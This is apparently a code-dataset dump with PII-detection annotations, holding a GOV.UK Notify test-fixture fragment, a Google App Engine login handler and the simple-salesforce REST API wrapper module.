BroadcastProvider.VODAFONE: + provider_message_number = BroadcastProviderMessageNumber( + broadcast_provider_message_id=broadcast_provider_message_id) + db.session.add(provider_message_number) + db.session.commit() + return provider_message + + +def create_webauthn_credential( + user, + name='my key', + *, + credential_data='ABC123', + registration_response='DEF456', +): + webauthn_credential = WebauthnCredential( + user=user, + name=name, + credential_data=credential_data, + registration_response=registration_response + ) + + db.session.add(webauthn_credential) + db.session.commit() + return webauthn_credential +",41713,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], 
['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['MEDICAL_LICENSE', 'ee9390147'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2021-03-01'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750'""], ['URL', ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S'""], ['DATE_TIME', 'LETTER_TYPE'], ['PERSON', 'ReturnedLetter'], ['LOCATION', 'save_model_user(user'], ['PERSON', 'crown=True'], ['PERSON', 'crown=crown'], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'to_field'], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'billable_units=1'], ['PERSON', 'service_id'], ['PERSON', 'create_inbound_sms'], ['LOCATION', 'service.inbound_number'], ['LOCATION', 'service_inbound_api'], ['PERSON', 'save_service_callback_api(service_callback_api'], ['PERSON', ""post_class='second""], ['PERSON', 'crown=crown'], ['LOCATION', 'create_api_key(service'], ['PERSON', ""provider='mmg""], ['PERSON', 'organisation_id'], ['LOCATION', 'sorted_count=0'], ['LOCATION', 'messages_total=35'], ['LOCATION', 'EMAIL_TYPE'], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', '2016-03-14T12:35:26.665Z"",\\n'], ['URL', 'dd426d95ee9390147a5624348ee.pe'], ['PERSON', 'invited_user = InvitedUser(**data'], ['DATE_TIME', 'year\n '], ['PERSON', 'org_1 = create_organisation'], ['LOCATION', 'billable_unit=3'], ['LOCATION', 'rate=.50'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'notifications_sent=7'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'rate=.50'], ['DATE_TIME', 'year\n '], ['DATE_TIME', 'year\n '], ['PERSON', 'ReturnedLetter'], ['NRP', 'contact_list'], ['PERSON', 'message_type=message_type'], ['LOCATION', 'broadcast_message.areas'], ['URL', 'https://something.com'], ['URL', 'https://something.com'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.jo'], ['URL', 'app.dao.no'], ['URL', 'app.dao.org'], ['URL', 'app.dao.pe'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.us'], ['URL', 'app.mo'], ['URL', 'email.com'], ['URL', 
'User.query.fi'], ['URL', 'service.id'], ['URL', 'user.id'], ['URL', 'dao.se'], ['URL', 'Service.query.fi'], ['URL', 'email.com'], ['URL', 'service.cr'], ['URL', 'service.ac'], ['URL', 'service.re'], ['URL', 'service.co'], ['URL', 'service.us'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'inbound.id'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'sender.id'], ['URL', 'service.cr'], ['URL', 'template.ar'], ['URL', 'email.com'], ['URL', 'ApiKey.query.fi'], ['URL', 'ApiKey.se'], ['URL', 'template.se'], ['URL', 'ApiKey.ke'], ['URL', 'template.se'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'template.cr'], ['URL', 'ServicePermission.query.al'], ['URL', 'service.in'], ['URL', 'service.id'], ['URL', 'service.ge'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'x2.pn'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'organisation.id'], ['URL', 'email.com'], ['URL', 'Notify-20180118123.rs'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'service.id'], ['URL', 'job.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'dao.in'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'notification.id'], ['URL', 'service.id'], ['URL', 'datetime.no'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'a6-238.smtp-out.eu-west-1.amazonses.com'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'date.st'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letter.id'], ['URL', 'letter.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '1.id'], ['URL', 'emails.na'], ['URL', 
'2.id'], ['URL', 'letters.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letters.id'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'org.id'], ['URL', 'allowance.id'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'service.id'], ['URL', 'by.id'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'message.se'], ['URL', 'message.ar'], ['URL', 'www.notifications.service.gov.uk'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com']]" +100,"# -*- coding: utf-8 -*- + + +import os +import uuid +import datetime +from google.appengine.ext import webapp +from google.appengine.api import users +from google.appengine.ext import db +from google.appengine.api import mail +from google.appengine.ext.webapp import template + +from django.utils import simplejson as json +from google.appengine.api import urlfetch +import urllib + +import conf +import app.FlyingClub +import app.CoreHandler +from app.models import Comment, Crew + + + + +class AuthHandler(webapp.RequestHandler): + + + ################################################################################################### + ## Get Actions + ################################################################################################### + def get(self, section=None, page=None): + + #sessID = self.do_cookie_check() + section = 'auth' + template_vars = {} + App = app.FlyingClub.FlyingClub(section, page) + template_vars['app'] = App + + #tvars['appo'] = Appo + #tvars['conf'] = conf + #tvars['user'] = None + #template_vars['crewID'] = crewID + #f 'sessIdent' in self.request.cookies: + #sessIdent = self.request.cookies['sessIdent'] + #lse: + # sessIdent = None + + ## Setup Section and Page + #if section == None: + #section = ""index"" + #template_vars['section'] = section + #template_vars['page'] = page + + + ## Get Comments + q = db.GqlQuery(""SELECT * FROM Comment "" + + ""WHERE section = :1 "" + + ""ORDER BY dated DESC"", + section) + results = q.fetch(50) + #template_vars['comments'] = results + + ## Application Object + + #template_vars['page_title'] = Appo.title(""/%s/"" % section) + + + ## Setup User + Aauth + #user = users.get_current_user() + #if not user: + # template_vars['user'] = None + # template_vars['login_url'] = users.create_login_url(""/set_session/"") + #else: + # template_vars['user'] = user + # template_vars['logout_url'] = users.create_logout_url(""/subscribe/"") + + + ## Sign In Section + #if section == 'ssignin' : + # if sessID: + # self.redirect(""/profile/"") + # return + #template_vars['page_title'] = 'Sign In with OpenId' + + #if section == 'sdo_logout': + # cook_str = 'sessID=%s; expires=Fri, 31-Dec-1980 23:59:59 GMT; Path=/;' % '' + # self.response.headers.add_header( 'Set-Cookie', + # cook_str + # ) + # self.redirect(""/"") + # return + + + #if section == 'sprofile': + # if not sessID: + # self.redirect(""/signin/"") + # return + #template_vars['welcome'] = True if self.request.get(""welcome"") == '1' else False + #template_vars['page_title'] = 'My Profile' + + + main_template = '%s.html' % (section) + path = '/%s/' % (section) + #template_vars['path'] = path + + + template_path = 
os.path.join(os.path.dirname(__file__), '../templates/pages/%s' % main_template) + self.response.out.write(template.render(template_path, template_vars)) + + + + ################################################################################################### + ## Post Actions + ################################################################################################### + def post(self, page=None): + + if page == 'rpx': + token = self.request.get('token') + url = 'https://rpxnow.com/api/v2/auth_info' + args = { + 'format': 'json', + 'apiKey': conf.RPX_API_KEY, + 'token': token + } + + r = urlfetch.fetch( url=url, + payload=urllib.urlencode(args), + method=urlfetch.POST, + headers={'Content-Type':'application/x-www-form-urlencoded'} + ) + data = json.loads(r.content) + + if data['stat'] == 'ok': + welcome = 0 + unique_identifier = data['profile']['identifier'] + + q = db.GqlQuery(""select * from Crew where ident= :1"", unique_identifier) + crew = q.get() + if not crew: + crew = Crew(ident=unique_identifier) + crew.name = data['profile']['preferredUsername'] + if data['profile'].has_key('email'): + crew.email = data['profile']['email'] + crew.put() + welcome = 1 + subject = ""New Login: %s"" % crew.name + body = ""New login on schedule"" + else: + subject = ""Return Login: %s"" % crew.name + body = ""New login on schedule"" + + sessID = str(crew.key()) + cook_str = 'crewID=%s; expires=Fri, 31-Dec-2020 23:59:59 GMT; Path=/;' % crew.id() + self.response.headers.add_header( 'Set-Cookie', + cook_str + ) + mail.send_mail( sender = conf.EMAIL, + to = ""Dev dummy@email.com"", + subject = subject, + body = body + ) + self.redirect(""/profile/?welcome=%s"" % welcome) + return + else: + print section, page + #self.redirect(""/"") + + + + + + + + + + + + + + +",4533,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://rpxnow.com/api/v2/auth_info'""], ['PERSON', ""template_vars['app""], ['URL', 'users.cr'], ['URL', 'users.cr'], ['PERSON', '#'], ['DATE_TIME', '23:59:59 GMT'], ['URL', 'r.co'], ['PERSON', ""data['profile']['identifier""], ['NRP', 'sessID'], ['DATE_TIME', '31-Dec-2020'], ['DATE_TIME', '23:59:59 GMT'], ['PERSON', 'EMAIL'], ['DATE_TIME', '31-Dec-1980'], ['URL', 'app.Co'], ['URL', 'app.mo'], ['URL', 'webapp.Re'], ['URL', 'self.do'], ['URL', 'self.request.co'], ['URL', 'self.request.co'], ['URL', 'db.Gq'], ['URL', 'users.ge'], ['URL', 'self.red'], ['URL', 'self.response.headers.ad'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'self.request.ge'], ['URL', 's.ht'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.request.ge'], ['URL', 'db.Gq'], ['URL', 'q.ge'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.ke'], ['URL', 'crew.id'], ['URL', 'self.response.headers.ad'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'self.red'], ['URL', 'self.red']]" +101,"""""""Core classes and exceptions for Simple-Salesforce"""""" + + +# has to be defined prior to login import +DEFAULT_API_VERSION = '29.0' + + +import requests +import json + +try: + from urlparse import urlparse +except ImportError: + # Python 3+ + from urllib.parse import urlparse +from simple_salesforce.login import SalesforceLogin +from simple_salesforce.util import date_to_iso8601, SalesforceError + +try: + from collections import OrderedDict +except ImportError: + # Python < 2.7 + from ordereddict import OrderedDict + + +class Salesforce(object): + """"""Salesforce Instance + + An instance of Salesforce is a handy way to wrap a Salesforce 
session + for easy use of the Salesforce REST API. + """""" + def __init__( + self, username=None, password=None, security_token=None, + session_id=None, instance=None, instance_url=None, + organizationId=None, sandbox=False, version=DEFAULT_API_VERSION, + proxies=None, session=None): + """"""Initialize the instance with the given parameters. + + Available kwargs + + Password Authentication: + + * username -- the Salesforce username to use for authentication + * password -- the password for the username + * security_token -- the security token for the username + * sandbox -- True if you want to login to `test.salesforce.com`, False + if you want to login to `login.salesforce.com`. + + Direct Session and Instance Access: + + * session_id -- Access token for this session + + Then either + * instance -- Domain of your Salesforce instance, i.e. `na1.salesforce.com` + OR + * instance_url -- Full URL of your instance i.e. `https://na1.salesforce.com` + + Universal Kwargs: + * version -- the version of the Salesforce API to use, for example `29.0` + * proxies -- the optional map of scheme to proxy server + * session -- Custom requests session, created in calling code. This + enables the use of requests Session features not otherwise + exposed by simple_salesforce. + + """""" + + # Determine if the user passed in the optional version and/or sandbox kwargs + self.sf_version = version + self.sandbox = sandbox + self.proxies = proxies + + # Determine if the user wants to use our username/password auth or pass in their own information + if all(arg is not None for arg in (username, password, security_token)): + self.auth_type = ""password"" + + # Pass along the username/password to our login helper + self.session_id, self.sf_instance = SalesforceLogin( + session=session, + username=username, + password=password, + security_token=security_token, + sandbox=self.sandbox, + sf_version=self.sf_version, + proxies=self.proxies) + + elif all(arg is not None for arg in (session_id, instance or instance_url)): + self.auth_type = ""direct"" + self.session_id = session_id + + # If the user provides the full url (as returned by the OAuth interface for + # example) extract the hostname (which we rely on) + if instance_url is not None: + self.sf_instance = urlparse(instance_url).hostname + else: + self.sf_instance = instance + + elif all(arg is not None for arg in (username, password, organizationId)): + self.auth_type = 'ipfilter' + + # Pass along the username/password to our login helper + self.session_id, self.sf_instance = SalesforceLogin( + session=session, + username=username, + password=password, + organizationId=organizationId, + sandbox=self.sandbox, + sf_version=self.sf_version, + proxies=self.proxies) + + else: + raise TypeError( + 'You must provide login information or an instance and token' + ) + + if self.sandbox: + self.auth_site = 'https://test.salesforce.com' + else: + self.auth_site = 'https://login.salesforce.com' + + self.request = session or requests.Session() + self.request.proxies = self.proxies + self.headers = { + 'Content-Type': 'application/json', + 'Authorization': 'Bearer ' + self.session_id, + 'X-PrettyPrint': '1' + } + + self.base_url = ('https://{instance}/services/data/v{version}/' + .format(instance=self.sf_instance, + version=self.sf_version)) + self.apex_url = ('https://{instance}/services/apexrest/' + .format(instance=self.sf_instance)) + + def describe(self): + url = self.base_url + ""sobjects"" + result = self.request.get(url, headers=self.headers) + if result.status_code != 200:
+ raise SalesforceGeneralError(url, + 'describe', + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + # SObject Handler + def __getattr__(self, name): + """"""Returns an `SFType` instance for the given Salesforce object type + (given in `name`). + + The magic part of the SalesforceAPI, this function translates + calls such as `salesforce_api_instance.Lead.metadata()` into fully + constituted `SFType` instances to make a nice Python API wrapper + for the REST API. + + Arguments: + + * name -- the name of a Salesforce object type, e.g. Lead or Contact + """""" + + # fix to enable serialization (https://github.com/heroku/simple-salesforce/issues/60) + if name.startswith('__'): + return super(Salesforce, self).__getattr__(name) + + return SFType(name, self.session_id, self.sf_instance, self.sf_version, self.proxies) + + # User utility methods + def set_password(self, user, password): + """"""Sets the password of a user + + salesforce dev documentation link: + https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm + + Arguments: + + * user: the userID of the user to set + * password: the new password + """""" + + url = self.base_url + 'sobjects/User/%s/password' % user + params = { 'NewPassword' : password, } + + result = self.request.post(url, headers=self.headers, data=json.dumps(params)) + + # Salesforce returns 204 No Content when the request is successful + if result.status_code != 200 and result.status_code != 204: + raise SalesforceGeneralError(url, + 'User', + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + def setPassword(self, user, password): + import warnings + warnings.warn( + ""This method has been deprecated. Please use set_password instead."", DeprecationWarning) + return self.set_password(user, password) + + # Generic Rest Function + def restful(self, path, params): + """"""Allows you to make a direct REST call if you know the path + + Arguments: + + * path: The path of the request + Example: sobjects/User/ABC123/password + * params: dict of parameters to pass to the path + """""" + + url = self.base_url + path + result = self.request.get(url, headers=self.headers, params=params) + if result.status_code != 200: + raise SalesforceGeneralError(url, + path, + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + # Search Functions + def search(self, search): + """"""Returns the result of a Salesforce search as a dict decoded from + the Salesforce response JSON payload. + + Arguments: + + * search -- the fully formatted SOSL search string, e.g. + `FIND {Waldo}` + """""" + url = self.base_url + 'search/' + + # `requests` will correctly encode the query string passed as `params` + params = {'q': search} + result = self.request.get(url, headers=self.headers, params=params) + if result.status_code != 200: + raise SalesforceGeneralError(url, + 'search', + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + def quick_search(self, search): + """"""Returns the result of a Salesforce search as a dict decoded from + the Salesforce response JSON payload.
+ + Arguments: + + * search -- the non-SOSL search string, e.g. `Waldo`. This search + string will be wrapped to read `FIND {Waldo}` before being + sent to Salesforce + """""" + search_string = u'FIND {{{search_string}}}'.format(search_string=search) + return self.search(search_string) + + # Query Handler + def query(self, query, **kwargs): + """"""Return the result of a Salesforce SOQL query as a dict decoded from + the Salesforce response JSON payload. + + Arguments: + + * query -- the SOQL query to send to Salesforce, e.g. + `SELECT Id FROM Lead WHERE Email = dummy@email.com""` + """""" + url = self.base_url + 'query/' + params = {'q': query} + # `requests` will correctly encode the query string passed as `params` + result = self.request.get(url, headers=self.headers, params=params, **kwargs) + + if result.status_code != 200: + _exception_handler(result) + + return result.json(object_pairs_hook=OrderedDict) + + def query_more(self, next_records_identifier, identifier_is_url=False, **kwargs): + """"""Retrieves more results from a query that returned more results + than the batch maximum. Returns a dict decoded from the Salesforce + response JSON payload. + + Arguments: + + * next_records_identifier -- either the Id of the next Salesforce + object in the result, or a URL to the + next record in the result. + * identifier_is_url -- True if `next_records_identifier` should be + treated as a URL, False if + `next_records_identifier` should be treated as + an Id. + """""" + if identifier_is_url: + # Don't use `self.base_url` here because the full URI is provided + url = (u'https://{instance}{next_record_url}' + .format(instance=self.sf_instance, + next_record_url=next_records_identifier)) + else: + url = self.base_url + 'query/{next_record_id}' + url = url.format(next_record_id=next_records_identifier) + result = self.request.get(url, headers=self.headers, **kwargs) + + if result.status_code != 200: + _exception_handler(result) + + return result.json(object_pairs_hook=OrderedDict) + + def query_all(self, query, **kwargs): + """"""Returns the full set of results for the `query`. This is a + convenience wrapper around `query(...)` and `query_more(...)`. + + The returned dict is the decoded JSON payload from the final call to + Salesforce, but with the `totalSize` field representing the full + number of results retrieved and the `records` list representing the + full list of records retrieved. + + Arguments: + + * query -- the SOQL query to send to Salesforce, e.g. + `SELECT Id FROM Lead WHERE Email = dummy@email.com""` + """""" + def get_all_results(previous_result, **kwargs): + """"""Inner function for recursing until there are no more results.
+ + Returns the full set of results that will be the return value for + `query_all(...)` + + Arguments: + + * previous_result -- the modified result of previous calls to + Salesforce for this query + """""" + if previous_result['done']: + return previous_result + else: + result = self.query_more(previous_result['nextRecordsUrl'], + identifier_is_url=True, **kwargs) + result['totalSize'] += previous_result['totalSize'] + # Include the new list of records with the previous list + previous_result['records'].extend(result['records']) + result['records'] = previous_result['records'] + # Continue the recursion + return get_all_results(result, **kwargs) + + # Make the initial query to Salesforce + result = self.query(query, **kwargs) + # The number of results might have exceeded the Salesforce batch limit + # so check whether there are more results and retrieve them if so. + return get_all_results(result, **kwargs) + + def apexecute(self, action, method='GET', data=None, **kwargs): + """"""Makes an HTTP request to an APEX REST endpoint + + Arguments: + + * action -- The REST endpoint for the request. + * method -- HTTP method for the request (default GET) + * data -- A dict of parameters to send in a POST / PUT request + * kwargs -- Additional kwargs to pass to `requests.request` + """""" + result = self._call_salesforce(method, self.apex_url + action, + data=json.dumps(data), **kwargs) + + if result.status_code == 200: + try: + response_content = result.json() + except Exception: + response_content = result.text + return response_content + + def _call_salesforce(self, method, url, **kwargs): + """"""Utility method for performing HTTP call to Salesforce. + + Returns a `requests.result` object. + """""" + result = self.request.request(method, url, headers=self.headers, **kwargs) + + if result.status_code >= 300: + _exception_handler(result) + + return result + + +class SFType(object): + """"""An interface to a specific type of SObject"""""" + + def __init__(self, object_name, session_id, sf_instance, sf_version='27.0', proxies=None): + """"""Initialize the instance with the given parameters. + + Arguments: + + * object_name -- the name of the type of SObject this represents, + e.g. `Lead` or `Contact` + * session_id -- the session ID for authenticating to Salesforce + * sf_instance -- the domain of the instance of Salesforce to use + * sf_version -- the version of the Salesforce API to use + * proxies -- the optional map of scheme to proxy server + """""" + self.session_id = session_id + self.name = object_name + self.request = requests.Session() + self.request.proxies = proxies + + self.base_url = (u'https://{instance}/services/data/v{sf_version}/sobjects/{object_name}/' + .format(instance=sf_instance, + object_name=object_name, + sf_version=sf_version)) + + def metadata(self): + """"""Returns the result of a GET to `.../{object_name}/` as a dict + decoded from the JSON payload returned by Salesforce. + """""" + result = self._call_salesforce('GET', self.base_url) + return result.json(object_pairs_hook=OrderedDict) + + def describe(self): + """"""Returns the result of a GET to `.../{object_name}/describe` as a + dict decoded from the JSON payload returned by Salesforce. + """""" + result = self._call_salesforce('GET', self.base_url + 'describe') + return result.json(object_pairs_hook=OrderedDict) + + def describe_layout(self, record_id): + """"""Returns the result of a GET to `.../{object_name}/describe/layouts/` as a + dict decoded from the JSON payload returned by Salesforce. 
+ """""" + result = self._call_salesforce('GET', self.base_url + 'describe/layouts/' + record_id) + return result.json(object_pairs_hook=OrderedDict) + + def get(self, record_id): + """"""Returns the result of a GET to `.../{object_name}/{record_id}` as a + dict decoded from the JSON payload returned by Salesforce. + + Arguments: + + * record_id -- the Id of the SObject to get + """""" + result = self._call_salesforce('GET', self.base_url + record_id) + return result.json(object_pairs_hook=OrderedDict) + + def get_by_custom_id(self, custom_id_field, custom_id): + """"""Returns the result of a GET to `.../{object_name}/{custom_id_field}/{custom_id}` as a + dict decoded from the JSON payload returned by Salesforce. + + Arguments: + + * custom_id_field -- the API name of a custom field that was defined as an External ID + * custom_id - the External ID value of the SObject to get + """""" + custom_url = self.base_url + '{custom_id_field}/{custom_id}'.format( + custom_id_field=custom_id_field, custom_id=custom_id) + result = self._call_salesforce('GET', custom_url) + return result.json(object_pairs_hook=OrderedDict) + + def create(self, data): + """"""Creates a new SObject using a POST to `.../{object_name}/`. + + Returns a dict decoded from the JSON payload returned by Salesforce. + + Arguments: + + * data -- a dict of the data to create the SObject from. It will be + JSON-encoded before being transmitted. + """""" + result = self._call_salesforce('POST', self.base_url, + data=json.dumps(data)) + return result.json(object_pairs_hook=OrderedDict) + + def upsert(self, record_id, data, raw_response=False): + """"""Creates or updates an SObject using a PATCH to + `.../{object_name}/{record_id}`. + + If `raw_response` is false (the default), returns the status code + returned by Salesforce. Otherwise, return the `requests.Response` + object. + + Arguments: + + * record_id -- an identifier for the SObject as described in the + Salesforce documentation + * data -- a dict of the data to create or update the SObject from. It + will be JSON-encoded before being transmitted. + * raw_response -- a boolean indicating whether to return the response + directly, instead of the status code. + """""" + result = self._call_salesforce('PATCH', self.base_url + record_id, + data=json.dumps(data)) + return self._raw_response(result, raw_response) + + def update(self, record_id, data, raw_response=False): + """"""Updates an SObject using a PATCH to + `.../{object_name}/{record_id}`. + + If `raw_response` is false (the default), returns the status code + returned by Salesforce. Otherwise, return the `requests.Response` + object. + + Arguments: + + * record_id -- the Id of the SObject to update + * data -- a dict of the data to update the SObject from. It will be + JSON-encoded before being transmitted. + * raw_response -- a boolean indicating whether to return the response + directly, instead of the status code. + """""" + result = self._call_salesforce('PATCH', self.base_url + record_id, + data=json.dumps(data)) + return self._raw_response(result, raw_response) + + def delete(self, record_id, raw_response=False): + """"""Deletes an SObject using a DELETE to + `.../{object_name}/{record_id}`. + + If `raw_response` is false (the default), returns the status code + returned by Salesforce. Otherwise, return the `requests.Response` + object. + + Arguments: + + * record_id -- the Id of the SObject to delete + * raw_response -- a boolean indicating whether to return the response + directly, instead of the status code. 
+ """""" + result = self._call_salesforce('DELETE', self.base_url + record_id) + return self._raw_response(result, raw_response) + + def deleted(self, start, end): + """"""Use the SObject Get Deleted resource to get a list of deleted records for the specified object. + .../deleted/?start=2013-05-05T00:00:00+00:00&end=2013-05-10T00:00:00+00:00 + + * start -- start datetime object + * end -- end datetime object + """""" + url = self.base_url + 'deleted/?start={start}&end={end}'.format( + start=date_to_iso8601(start), end=date_to_iso8601(end)) + result = self._call_salesforce('GET', url) + return result.json(object_pairs_hook=OrderedDict) + + def updated(self, start, end): + """"""Use the SObject Get Updated resource to get a list of updated (modified or added) + records for the specified object. + + .../updated/?start=2014-03-20T00:00:00+00:00&end=2014-03-22T00:00:00+00:00 + + * start -- start datetime object + * end -- end datetime object + """""" + url = self.base_url + 'updated/?start={start}&end={end}'.format( + start=date_to_iso8601(start), end=date_to_iso8601(end)) + result = self._call_salesforce('GET', url) + return result.json(object_pairs_hook=OrderedDict) + + def _call_salesforce(self, method, url, **kwargs): + """"""Utility method for performing HTTP call to Salesforce. + + Returns a `requests.result` object. + """""" + headers = { + 'Content-Type': 'application/json', + 'Authorization': 'Bearer ' + self.session_id, + 'X-PrettyPrint': '1' + } + result = self.request.request(method, url, headers=headers, **kwargs) + + if result.status_code >= 300: + _exception_handler(result, self.name) + + return result + + def _raw_response(self, response, body_flag): + """"""Utility method for processing the response and returning either the + status code or the response object. + + Returns either an `int` or a `requests.Response` object. + """""" + if not body_flag: + return response.status_code + else: + return response + + +class SalesforceAPI(Salesforce): + """"""Depreciated SalesforceAPI Instance + + This class implements the Username/Password Authentication Mechanism using Arguments + It has since been surpassed by the 'Salesforce' class, which relies on kwargs + + """""" + def __init__(self, username, password, security_token, sandbox=False, + sf_version='27.0'): + """"""Initialize the instance with the given parameters. + + Arguments: + + * username -- the Salesforce username to use for authentication + * password -- the password for the username + * security_token -- the security token for the username + * sandbox -- True if you want to login to `test.salesforce.com`, False + if you want to login to `login.salesforce.com`. + * sf_version -- the version of the Salesforce API to use, for example + ""27.0"" + """""" + import warnings + warnings.warn( + ""Use of login arguments has been depreciated. Please use kwargs"", + DeprecationWarning + ) + + super(SalesforceAPI, self).__init__(username=username, + password=password, + security_token=security_token, + sandbox=sandbox, + version=sf_version) + + +def _exception_handler(result, name=""""): + """"""Exception router. 
